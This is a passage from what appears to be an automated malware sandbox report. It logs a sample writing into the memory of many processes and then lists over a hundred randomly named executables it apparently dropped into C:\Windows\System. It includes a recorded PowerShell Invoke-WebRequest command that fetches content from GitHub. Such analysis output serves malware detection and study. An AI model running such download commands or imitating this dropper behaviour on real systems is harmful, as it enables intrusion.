PID 2352 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AtzgPFc.exe
PID 2352 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AtzgPFc.exe
PID 2352 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pxtdjGC.exe
PID 2352 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pxtdjGC.exe
PID 2352 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pxtdjGC.exe
PID 2352 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cJtPwoD.exe
PID 2352 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cJtPwoD.exe
PID 2352 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cJtPwoD.exe
PID 2352 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cMKesTQ.exe
PID 2352 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cMKesTQ.exe
PID 2352 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\cMKesTQ.exe
PID 2352 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pWDiXOP.exe
PID 2352 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pWDiXOP.exe
PID 2352 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\pWDiXOP.exe
PID 2352 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\eniyzxk.exe
PID 2352 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\eniyzxk.exe
PID 2352 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\eniyzxk.exe
PID 2352 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MbDdCML.exe
PID 2352 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MbDdCML.exe
PID 2352 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\MbDdCML.exe
PID 2352 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\gfifTGX.exe
PID 2352 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\gfifTGX.exe
PID 2352 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\gfifTGX.exe
PID 2352 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AxZpdxI.exe
PID 2352 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AxZpdxI.exe
PID 2352 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\AxZpdxI.exe
PID 2352 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\miPikZW.exe
PID 2352 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\miPikZW.exe
PID 2352 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\miPikZW.exe
PID 2352 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\lLFvILn.exe
PID 2352 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\lLFvILn.exe
PID 2352 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\lLFvILn.exe
PID 2352 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\VfYCcpI.exe
PID 2352 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\VfYCcpI.exe
PID 2352 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\VfYCcpI.exe
PID 2352 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\Ohxqjpo.exe
PID 2352 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\Ohxqjpo.exe
PID 2352 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\Ohxqjpo.exe
PID 2352 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\myHSYnJ.exe
PID 2352 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\myHSYnJ.exe
PID 2352 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\myHSYnJ.exe
PID 2352 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\bYIjiUg.exe
PID 2352 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\bYIjiUg.exe
PID 2352 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\bYIjiUg.exe
PID 2352 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\GxmpAVc.exe
PID 2352 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\GxmpAVc.exe
PID 2352 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\GxmpAVc.exe
PID 2352 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\kZwvbGv.exe
PID 2352 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\kZwvbGv.exe
PID 2352 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\kZwvbGv.exe
PID 2352 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\JWNZCID.exe
PID 2352 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\JWNZCID.exe
PID 2352 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\JWNZCID.exe
PID 2352 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HYMTyuY.exe
PID 2352 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HYMTyuY.exe
PID 2352 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\HYMTyuY.exe
PID 2352 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe C:\Windows\System\wBlWqsq.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f74b24d7aca6e5a9c072dec723951f0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\MTKniSn.exe

C:\Windows\System\MTKniSn.exe

C:\Windows\System\AtzgPFc.exe

C:\Windows\System\AtzgPFc.exe

C:\Windows\System\pxtdjGC.exe

C:\Windows\System\pxtdjGC.exe

C:\Windows\System\cJtPwoD.exe

C:\Windows\System\cJtPwoD.exe

C:\Windows\System\cMKesTQ.exe

C:\Windows\System\cMKesTQ.exe

C:\Windows\System\pWDiXOP.exe

C:\Windows\System\pWDiXOP.exe

C:\Windows\System\eniyzxk.exe

C:\Windows\System\eniyzxk.exe

C:\Windows\System\MbDdCML.exe

C:\Windows\System\MbDdCML.exe

C:\Windows\System\gfifTGX.exe

C:\Windows\System\gfifTGX.exe

C:\Windows\System\AxZpdxI.exe

C:\Windows\System\AxZpdxI.exe

C:\Windows\System\miPikZW.exe

C:\Windows\System\miPikZW.exe

C:\Windows\System\lLFvILn.exe

C:\Windows\System\lLFvILn.exe

C:\Windows\System\VfYCcpI.exe

C:\Windows\System\VfYCcpI.exe

C:\Windows\System\Ohxqjpo.exe

C:\Windows\System\Ohxqjpo.exe

C:\Windows\System\myHSYnJ.exe

C:\Windows\System\myHSYnJ.exe

C:\Windows\System\bYIjiUg.exe

C:\Windows\System\bYIjiUg.exe

C:\Windows\System\GxmpAVc.exe

C:\Windows\System\GxmpAVc.exe

C:\Windows\System\kZwvbGv.exe

C:\Windows\System\kZwvbGv.exe

C:\Windows\System\JWNZCID.exe

C:\Windows\System\JWNZCID.exe

C:\Windows\System\HYMTyuY.exe

C:\Windows\System\HYMTyuY.exe

C:\Windows\System\wBlWqsq.exe

C:\Windows\System\wBlWqsq.exe

C:\Windows\System\wbpEhET.exe

C:\Windows\System\wbpEhET.exe

C:\Windows\System\NsfWPyP.exe

C:\Windows\System\NsfWPyP.exe

C:\Windows\System\zYMRSKr.exe

C:\Windows\System\zYMRSKr.exe

C:\Windows\System\ohMREop.exe

C:\Windows\System\ohMREop.exe

C:\Windows\System\TVQopmo.exe

C:\Windows\System\TVQopmo.exe

C:\Windows\System\mRvlMfx.exe

C:\Windows\System\mRvlMfx.exe

C:\Windows\System\qUrNGnf.exe

C:\Windows\System\qUrNGnf.exe

C:\Windows\System\OeQVnBU.exe

C:\Windows\System\OeQVnBU.exe

C:\Windows\System\fJqlTdu.exe

C:\Windows\System\fJqlTdu.exe

C:\Windows\System\eTvIGnS.exe

C:\Windows\System\eTvIGnS.exe

C:\Windows\System\znBSpUi.exe

C:\Windows\System\znBSpUi.exe

C:\Windows\System\XZhdYTJ.exe

C:\Windows\System\XZhdYTJ.exe

C:\Windows\System\Woubika.exe

C:\Windows\System\Woubika.exe

C:\Windows\System\CvJIEqE.exe

C:\Windows\System\CvJIEqE.exe

C:\Windows\System\dxeGROM.exe

C:\Windows\System\dxeGROM.exe

C:\Windows\System\dZtxZtG.exe

C:\Windows\System\dZtxZtG.exe

C:\Windows\System\iWtRksB.exe

C:\Windows\System\iWtRksB.exe

C:\Windows\System\gukucQB.exe

C:\Windows\System\gukucQB.exe

C:\Windows\System\GSWMVlh.exe

C:\Windows\System\GSWMVlh.exe

C:\Windows\System\hqdIPCD.exe

C:\Windows\System\hqdIPCD.exe

C:\Windows\System\MkeeKvk.exe

C:\Windows\System\MkeeKvk.exe

C:\Windows\System\QXRgagH.exe

C:\Windows\System\QXRgagH.exe

C:\Windows\System\bwTKWzG.exe

C:\Windows\System\bwTKWzG.exe

C:\Windows\System\CwAZcPb.exe

C:\Windows\System\CwAZcPb.exe

C:\Windows\System\YkTxmwQ.exe

C:\Windows\System\YkTxmwQ.exe

C:\Windows\System\dAHXGvS.exe

C:\Windows\System\dAHXGvS.exe

C:\Windows\System\UrbqSKu.exe

C:\Windows\System\UrbqSKu.exe

C:\Windows\System\zGCnmuO.exe

C:\Windows\System\zGCnmuO.exe

C:\Windows\System\SFPlAVk.exe

C:\Windows\System\SFPlAVk.exe

C:\Windows\System\qRKYSNO.exe

C:\Windows\System\qRKYSNO.exe

C:\Windows\System\ElSNksp.exe

C:\Windows\System\ElSNksp.exe

C:\Windows\System\kffqQgT.exe

C:\Windows\System\kffqQgT.exe

C:\Windows\System\HLHoaPJ.exe

C:\Windows\System\HLHoaPJ.exe

C:\Windows\System\TJCVtQF.exe

C:\Windows\System\TJCVtQF.exe

C:\Windows\System\WObiiUV.exe

C:\Windows\System\WObiiUV.exe

C:\Windows\System\rIjDuZE.exe

C:\Windows\System\rIjDuZE.exe

C:\Windows\System\eAzduVq.exe

C:\Windows\System\eAzduVq.exe

C:\Windows\System\TbMsZPr.exe

C:\Windows\System\TbMsZPr.exe

C:\Windows\System\dBYHzst.exe

C:\Windows\System\dBYHzst.exe

C:\Windows\System\GSQgUry.exe

C:\Windows\System\GSQgUry.exe

C:\Windows\System\kuNfyDr.exe

C:\Windows\System\kuNfyDr.exe

C:\Windows\System\oogqQLf.exe

C:\Windows\System\oogqQLf.exe

C:\Windows\System\gIMGenX.exe

C:\Windows\System\gIMGenX.exe

C:\Windows\System\sfTKGcc.exe

C:\Windows\System\sfTKGcc.exe

C:\Windows\System\IthdBPl.exe

C:\Windows\System\IthdBPl.exe

C:\Windows\System\LraukvS.exe

C:\Windows\System\LraukvS.exe

C:\Windows\System\sBtZOMd.exe

C:\Windows\System\sBtZOMd.exe

C:\Windows\System\hJIXtQH.exe

C:\Windows\System\hJIXtQH.exe

C:\Windows\System\kOdfREB.exe

C:\Windows\System\kOdfREB.exe

C:\Windows\System\ZQcIJTP.exe

C:\Windows\System\ZQcIJTP.exe

C:\Windows\System\MQhgOXC.exe

C:\Windows\System\MQhgOXC.exe

C:\Windows\System\JatFuUV.exe

C:\Windows\System\JatFuUV.exe

C:\Windows\System\jhJAzIV.exe

C:\Windows\System\jhJAzIV.exe

C:\Windows\System\WQYyxLG.exe

C:\Windows\System\WQYyxLG.exe

C:\Windows\System\WwKBMrl.exe

C:\Windows\System\WwKBMrl.exe

C:\Windows\System\PNWNLad.exe

C:\Windows\System\PNWNLad.exe

C:\Windows\System\BAcYnmq.exe

C:\Windows\System\BAcYnmq.exe

C:\Windows\System\FUIhLDu.exe

C:\Windows\System\FUIhLDu.exe

C:\Windows\System\IcAmDHp.exe

C:\Windows\System\IcAmDHp.exe

C:\Windows\System\xerUqlY.exe

C:\Windows\System\xerUqlY.exe

C:\Windows\System\ejVqefA.exe

C:\Windows\System\ejVqefA.exe

C:\Windows\System\rfyRDiy.exe

C:\Windows\System\rfyRDiy.exe

C:\Windows\System\xbBEYZy.exe

C:\Windows\System\xbBEYZy.exe

C:\Windows\System\CLkEymQ.exe

C:\Windows\System\CLkEymQ.exe

C:\Windows\System\TFaRpgn.exe

C:\Windows\System\TFaRpgn.exe

C:\Windows\System\YnOlJXw.exe

C:\Windows\System\YnOlJXw.exe

C:\Windows\System\yuYYiIu.exe

C:\Windows\System\yuYYiIu.exe

C:\Windows\System\iLoAllX.exe

C:\Windows\System\iLoAllX.exe

C:\Windows\System\FknBREK.exe

C:\Windows\System\FknBREK.exe

C:\Windows\System\VKPLTSn.exe

C:\Windows\System\VKPLTSn.exe

C:\Windows\System\IrZlpKF.exe

C:\Windows\System\IrZlpKF.exe

C:\Windows\System\iJPhCwi.exe

C:\Windows\System\iJPhCwi.exe

C:\Windows\System\PmxFGpg.exe

C:\Windows\System\PmxFGpg.exe

C:\Windows\System\MGsYMRp.exe

C:\Windows\System\MGsYMRp.exe

C:\Windows\System\lAzmdXa.exe

C:\Windows\System\lAzmdXa.exe

C:\Windows\System\XWwzuvF.exe

C:\Windows\System\XWwzuvF.exe

C:\Windows\System\guLZAdb.exe

C:\Windows\System\guLZAdb.exe

C:\Windows\System\NHgdQGg.exe

C:\Windows\System\NHgdQGg.exe

C:\Windows\System\aJnPBHc.exe

C:\Windows\System\aJnPBHc.exe

C:\Windows\System\FqfgPfC.exe

C:\Windows\System\FqfgPfC.exe

C:\Windows\System\mXsMIwu.exe

C:\Windows\System\mXsMIwu.exe

C:\Windows\System\faxpfKU.exe

C:\Windows\System\faxpfKU.exe

C:\Windows\System\xYHrUbI.exe

C:\Windows\System\xYHrUbI.exe

C:\Windows\System\dIcLSQm.exe

C:\Windows\System\dIcLSQm.exe

C:\Windows\System\ccKjZCT.exe

C:\Windows\System\ccKjZCT.exe

C:\Windows\System\sCaSsbw.exe

C:\Windows\System\sCaSsbw.exe

C:\Windows\System\nMHeyPx.exe

C:\Windows\System\nMHeyPx.exe

C:\Windows\System\luwdGnD.exe

C:\Windows\System\luwdGnD.exe

C:\Windows\System\aOZNytK.exe

C:\Windows\System\aOZNytK.exe

C:\Windows\System\VDCNgVC.exe

C:\Windows\System\VDCNgVC.exe

C:\Windows\System\xzcMUdU.exe

C:\Windows\System\xzcMUdU.exe

C:\Windows\System\ngoSqcA.exe

C:\Windows\System\ngoSqcA.exe

C:\Windows\System\OBPEOEB.exe

C:\Windows\System\OBPEOEB.exe

C:\Windows\System\aUygtWd.exe

C:\Windows\System\aUygtWd.exe

C:\Windows\System\TtxsMxa.exe

C:\Windows\System\TtxsMxa.exe

C:\Windows\System\GtDeZWP.exe

C:\Windows\System\GtDeZWP.exe

C:\Windows\System\TSaMoYs.exe

C:\Windows\System\TSaMoYs.exe

C:\Windows\System\xzEyfUP.exe

C:\Windows\System\xzEyfUP.exe

C:\Windows\System\aizyxMs.exe

C:\Windows\System\aizyxMs.exe

C:\Windows\System\vlmwEWq.exe

C:\Windows\System\vlmwEWq.exe

C:\Windows\System\EnHtjfy.exe

C:\Windows\System\EnHtjfy.exe

C:\Windows\System\KMxMRmf.exe

C:\Windows\System\KMxMRmf.exe

C:\Windows\System\PDNkmDf.exe

C:\Windows\System\PDNkmDf.exe

C:\Windows\System\AnCEKpE.exe

C:\Windows\System\AnCEKpE.exe

C:\Windows\System\DSMtqmJ.exe

C:\Windows\System\DSMtqmJ.exe

C:\Windows\System\LNzBUfN.exe

C:\Windows\System\LNzBUfN.exe

C:\Windows\System\KgysEcZ.exe

C:\Windows\System\KgysEcZ.exe

C:\Windows\System\BpIUvGv.exe

C:\Windows\System\BpIUvGv.exe

C:\Windows\System\NdxIWPA.exe

C:\Windows\System\NdxIWPA.exe

C:\Windows\System\RoXYMaC.exe

C:\Windows\System\RoXYMaC.exe

C:\Windows\System\fashxOo.exe

C:\Windows\System\fashxOo.exe

C:\Windows\System\umitfeU.exe

C:\Windows\System\umitfeU.exe

C:\Windows\System\VlWWsNU.exe

C:\Windows\System\VlWWsNU.exe

C:\Windows\System\SDEAANy.exe

C:\Windows\System\SDEAANy.exe

C:\Windows\System\IsIjkDc.exe

C:\Windows\System\IsIjkDc.exe

C:\Windows\System\VjTSBSo.exe

C:\Windows\System\VjTSBSo.exe

C:\Windows\System\GMBoEYZ.exe

C:\Windows\System\GMBoEYZ.exe

C:\Windows\System\CDCeRQW.exe

C:\Windows\System\CDCeRQW.exe

C:\Windows\System\qvmClns.exe

C:\Windows\System\qvmClns.exe

C:\Windows\System\BFoZJlZ.exe

C:\Windows\System\BFoZJlZ.exe

C:\Windows\System\XtFpkOZ.exe

C:\Windows\System\XtFpkOZ.exe

C:\Windows\System\icdHzuM.exe

C:\Windows\System\icdHzuM.exe

C:\Windows\System\wviiWGd.exe

C:\Windows\System\wviiWGd.exe

C:\Windows\System\CZjaQZo.exe

C:\Windows\System\CZjaQZo.exe

C:\Windows\System\BZPJzpA.exe

C:\Windows\System\BZPJzpA.exe

C:\Windows\System\JYQpBxl.exe

C:\Windows\System\JYQpBxl.exe

C:\Windows\System\lMiraEh.exe

C:\Windows\System\lMiraEh.exe

C:\Windows\System\sBYGUuC.exe

C:\Windows\System\sBYGUuC.exe

C:\Windows\System\IBrZWbB.exe

C:\Windows\System\IBrZWbB.exe

C:\Windows\System\SsjQjUP.exe

C:\Windows\System\SsjQjUP.exe

C:\Windows\System\YUeRsTF.exe

C:\Windows\System\YUeRsTF.exe

C:\Windows\System\eWaSveJ.exe

C:\Windows\System\eWaSveJ.exe

C:\Windows\System\bGPjPfI.exe

C:\Windows\System\bGPjPfI.exe

C:\Windows\System\QrgCbps.exe

C:\Windows\System\QrgCbps.exe

C:\Windows\System\AISwJZY.exe

C:\Windows\System\AISwJZY.exe

C:\Windows\System\ajMiAlH.exe

C:\Windows\System\ajMiAlH.exe

C:\Windows\System\FpoXKIC.exe

C:\Windows\System\FpoXKIC.exe

C:\Windows\System\VQkqFOS.exe

C:\Windows\System\VQkqFOS.exe

C:\Windows\System\WEeasBy.exe

C:\Windows\System\WEeasBy.exe

C:\Windows\System\OcaUkTC.exe

C:\Windows\System\OcaUkTC.exe

C:\Windows\System\vQtXTPa.exe

C:\Windows\System\vQtXTPa.exe

C:\Windows\System\tFwvLAE.exe

C:\Windows\System\tFwvLAE.exe

C:\Windows\System\WAQLFDu.exe

C:\Windows\System\WAQLFDu.exe

C:\Windows\System\WaKVLOx.exe

C:\Windows\System\WaKVLOx.exe

C:\Windows\System\UanfVrw.exe

C:\Windows\System\UanfVrw.exe

C:\Windows\System\PLRHCIM.exe

C:\Windows\System\PLRHCIM.exe

C:\Windows\System\LixKRiu.exe

C:\Windows\System\LixKRiu.exe

C:\Windows\System\HsJpFpN.exe

C:\Windows\System\HsJpFpN.exe

C:\Windows\System\HDfpjDQ.exe

C:\Windows\System\HDfpjDQ.exe

C:\Windows\System\MYhlQdN.exe

C:\Windows\System\MYhlQdN.exe

C:\Windows\System\uxXUnzN.exe

C:\Windows\System\uxXUnzN.exe

C:\Windows\System\xNFxfgP.exe

C:\Windows\System\xNFxfgP.exe

C:\Windows\System\rZGjXlm.exe

C:\Windows\System\rZGjXlm.exe

C:\Windows\System\DUwCdyi.exe

C:\Windows\System\DUwCdyi.exe

C:\Windows\System\yKOSwSi.exe

C:\Windows\System\yKOSwSi.exe

C:\Windows\System\igawCBw.exe

C:\Windows\System\igawCBw.exe

C:\Windows\System\LsHEyJF.exe

C:\Windows\System\LsHEyJF.exe

C:\Windows\System\KWqZrEj.exe

C:\Windows\System\KWqZrEj.exe

C:\Windows\System\IesTsmc.exe

C:\Windows\System\IesTsmc.exe

C:\Windows\System\vecyAvZ.exe

C:\Windows\System\vecyAvZ.exe

C:\Windows\System\ZWIrrNp.exe

C:\Windows\System\ZWIrrNp.exe

C:\Windows\System\qnBudZq.exe

C:\Windows\System\qnBudZq.exe

C:\Windows\System\baHzTCm.exe

C:\Windows\System\baHzTCm.exe

C:\Windows\System\OHUPKaR.exe

C:\Windows\System\OHUPKaR.exe

C:\Windows\System\udzxKrx.exe

C:\Windows\System\udzxKrx.exe

C:\Windows\System\VRjRHfO.exe

C:\Windows\System\VRjRHfO.exe

C:\Windows\System\yriESmO.exe

C:\Windows\System\yriESmO.exe

C:\Windows\System\mXNmfBk.exe

C:\Windows\System\mXNmfBk.exe

C:\Windows\System\IYatSxY.exe

C:\Windows\System\IYatSxY.exe

C:\Windows\System\VjJuIqs.exe

C:\Windows\System\VjJuIqs.exe

C:\Windows\System\bgKLXui.exe

C:\Windows\System\bgKLXui.exe

C:\Windows\System\twbUXUK.exe

C:\Windows\System\twbUXUK.exe

C:\Windows\System\CIijUhv.exe

C:\Windows\System\CIijUhv.exe

C:\Windows\System\HoSiCzZ.exe

C:\Windows\System\HoSiCzZ.exe

C:\Windows\System\QaSoLpA.exe

C:\Windows\System\QaSoLpA.exe

C:\Windows\System\mymjwKF.exe

C:\Windows\System\mymjwKF.exe

C:\Windows\System\ZMibjmh.exe

C:\Windows\System\ZMibjmh.exe

C:\Windows\System\yrkgvSK.exe

C:\Windows\System\yrkgvSK.exe

C:\Windows\System\FnpDTpR.exe

C:\Windows\System\FnpDTpR.exe

C:\Windows\System\OqMlEzJ.exe

C:\Windows\System\OqMlEzJ.exe

C:\Windows\System\ioHguVI.exe

C:\Windows\System\ioHguVI.exe

C:\Windows\System\WwlbaKQ.exe

C:\Windows\System\WwlbaKQ.exe

C:\Windows\System\MfxGJbF.exe

C:\Windows\System\MfxGJbF.exe

C:\Windows\System\vujJwBV.exe

C:\Windows\System\vujJwBV.exe

C:\Windows\System\vPiZMhe.exe

C:\Windows\System\vPiZMhe.exe

C:\Windows\System\cCMvzVo.exe

C:\Windows\System\cCMvzVo.exe

C:\Windows\System\hOlbjkv.exe

C:\Windows\System\hOlbjkv.exe

C:\Windows\System\hBWDjxW.exe

C:\Windows\System\hBWDjxW.exe

C:\Windows\System\QXqFylg.exe

C:\Windows\System\QXqFylg.exe

C:\Windows\System\LsrziKW.exe

C:\Windows\System\LsrziKW.exe

C:\Windows\System\ETOktaO.exe

C:\Windows\System\ETOktaO.exe

C:\Windows\System\JupUVvy.exe

C:\Windows\System\JupUVvy.exe

C:\Windows\System\WmqjnSs.exe

C:\Windows\System\WmqjnSs.exe

C:\Windows\System\WvEoBYv.exe

C:\Windows\System\WvEoBYv.exe

C:\Windows\System\DZtedrD.exe

C:\Windows\System\DZtedrD.exe

C:\Windows\System\EDgXlal.exe

C:\Windows\System\EDgXlal.exe

C:\Windows\System\CMEuAwF.exe

C:\Windows\System\CMEuAwF.exe

C:\Windows\System\IUvxbbM.exe

C:\Windows\System\IUvxbbM.exe

C:\Windows\System\nXKBFob.exe

C:\Windows\System\nXKBFob.exe

C:\Windows\System\WCeAQsz.exe

C:\Windows\System\WCeAQsz.exe

C:\Windows\System\RiFlFiu.exe

C:\Windows\System\RiFlFiu.exe

C:\Windows\System\LPYDzbH.exe

C:\Windows\System\LPYDzbH.exe

C:\Windows\System\cwefRYQ.exe

C:\Windows\System\cwefRYQ.exe

C:\Windows\System\bMfDHic.exe

C:\Windows\System\bMfDHic.exe

C:\Windows\System\NOketsg.exe

C:\Windows\System\NOketsg.exe

C:\Windows\System\NQpVknK.exe

C:\Windows\System\NQpVknK.exe

C:\Windows\System\oUbpCbU.exe

C:\Windows\System\oUbpCbU.exe

C:\Windows\System\DCHSFnT.exe

C:\Windows\System\DCHSFnT.exe

C:\Windows\System\AvUTeST.exe

C:\Windows\System\AvUTeST.exe

C:\Windows\System\OetTBlN.exe

C:\Windows\System\OetTBlN.exe

C:\Windows\System\usMSEDS.exe

C:\Windows\System\usMSEDS.exe

C:\Windows\System\sZWFMvK.exe

C:\Windows\System\sZWFMvK.exe

C:\Windows\System\SiBkaGM.exe

C:\Windows\System\SiBkaGM.exe

C:\Windows\System\YlFgzXB.exe

C:\Windows\System\YlFgzXB.exe

C:\Windows\System\PsaNEGu.exe

C:\Windows\System\PsaNEGu.exe

C:\Windows\System\lXnSdny.exe

C:\Windows\System\lXnSdny.exe

C:\Windows\System\GqegwYn.exe

